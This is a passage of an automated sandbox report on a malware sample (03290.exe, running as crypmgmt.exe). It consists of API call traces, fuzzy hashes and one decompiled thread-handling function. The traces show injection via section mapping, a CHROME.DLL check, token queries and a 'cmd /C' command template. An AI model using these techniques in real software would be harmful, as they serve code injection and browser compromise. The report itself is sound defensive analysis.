    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 66739

General

Root Process Name:d3d8sext.exe
Process MD5:F3C6625D8EDE3FE6C8C4023337D761AC
Total matches:150
Initial Analysis Report:Open
Initial sample Analysis ID:66739
Initial sample SHA 256:A93182CDCDE8030CAC64378DA0406C7F628486EC1CF41B6E49CF5A551C0AB837
Initial sample name:03290.exe

Similar Executed Functions

Function 01B31CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: 0e930324d983736687636c65484061bdc5c26c6a22796dc9d5b5e2d04a25d73d
  • Instruction ID: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
  • Opcode Fuzzy Hash: 7821C045058D4286DDE3B8960613F97E142FF43F88C9CFBA4B49A6669F0E04311AEB4F
  • Instruction Fuzzy Hash: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
APIs
    • Part of subcall function 01B3278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
    • Part of subcall function 01B3278F: memset.NTDLL ref: 01B3280F
    • Part of subcall function 01B3278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
    • Part of subcall function 01B3278F: NtClose.NTDLL(?), ref: 01B3283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31B66: GetModuleHandleA.KERNEL32(01B380DB,?,CCCCFEEB,01B31E8C,?,?,?,00000000), ref: 01B31B99
    • Part of subcall function 01B31B66: memcpy.NTDLL(?,3!?w,00000018,01B3845C,01B38400,01B38451), ref: 01B31C04
  • memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B339A5: memset.NTDLL ref: 01B339C4
    • Part of subcall function 01B31C13: memcpy.NTDLL(CCCCFEEB,01B37478,00000018,CCCCFEEB,01B3845C,CCCCFEEB,01B38400,CCCCFEEB,01B38451,CCCCFEEB,01B31E84,?,01B323F9,?,?,00000000), ref: 01B31CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
  • CloseHandle.KERNEL32(00000000), ref: 01B31EE0
  • memset.NTDLL ref: 01B31EF4
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
    • Part of subcall function 01B3284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328AE
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328C3
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 01B32905
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
